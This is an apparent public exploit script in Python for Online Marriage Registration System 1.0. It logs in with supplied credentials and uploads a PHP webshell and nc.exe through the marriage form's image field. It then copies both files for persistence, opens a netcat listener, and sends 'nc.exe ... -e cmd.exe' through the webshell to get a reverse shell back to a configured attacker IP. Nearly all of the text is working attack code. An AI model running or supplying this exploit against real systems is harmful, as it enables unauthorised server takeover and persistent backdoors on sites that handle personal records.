Online Marriage Registration System version 1.0 authenticated remote code execution exploit. Original discovery of remote code execution in this version was discovered by Selim Enes Karaduman.
b2e2851076deae38beb369428e4efccf
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-14-12
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server
#!/usr/bin/python3
import requests
import sys
import os
import iterm2
import AppKit
url = sys.argv[1]
mobile = sys.argv[2]
password = sys.argv[3]
# CONFIGURE HERE
reverse_ip = '192.168.xx.xx'
reverse_port = 4444
# CONFIGURE HERE
# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
netcat_path = '/local/path/to/nc.exe'
shell_path = '/local/path/to/shell.php'
def login(url, mobile, password):
url = "{}/user/login.php".format(url)
payload = {'mobno':mobile, 'password':password, 'login':''}
req = requests.post(url, data=payload)
cookie = req.cookies['PHPSESSID']
return cookie
def upload(url, cookie, file=None):
f = open(file, 'rb')
filename, ext = os.path.splitext(file)
if "exe" in ext:
content_type = 'application/octet-stream'
else:
content_type = 'application/x-php'
cookie = {'PHPSESSID':cookie}
url = "{}/user/marriage-reg-form.php".format(url)
files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
req = requests.post(url, data=payload, cookies=cookie, files=files)
print(f'[+] File {ext} uploaded')
def get_remote_file(url, ext):
url = "{}/user/images".format(url)
req = requests.get(url)
junk = req.text.split(ext)[0]
f = junk[-42:] + ext
return f
def persistence(url, webshell, netcat):
# webshell
payload_w = "copy /y {} shell.php".format(webshell)
url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
req_w = requests.get(url_w)
# netcat
payload_n = "copy /y {} nc.exe".format(netcat)
url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
req_n= requests.get(url_n)
print('[+] Persistence enabled')
def get_reverse(url, ip, port):
payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
print('[+] Reverse shell incoming!')
req = requests.get(url_r)
# CONFIGURE HERE
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
def start_listener(port):
# Launch the app
AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
async def main(connection):
app = await iterm2.async_get_app(connection)
window = app.current_window
if window is not None:
cmd = "nc -lnv {}".format(port)
await window.async_create_tab(command=cmd)
else:
print("No current window")
iterm2.run_until_complete(main)
if __name__ == "__main__":
if len(sys.argv < 3):
print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
else:
cookie = login(url, mobile, password)
upload(url, cookie, netcat_path)
upload(url, cookie, shell_path)
webshell = get_remote_file(url, '.php')
netcat = get_remote_file(url, '.exe')
persistence(url, webshell, netcat)
start_listener(reverse_port)
get_reverse(url, reverse_ip, reverse_port)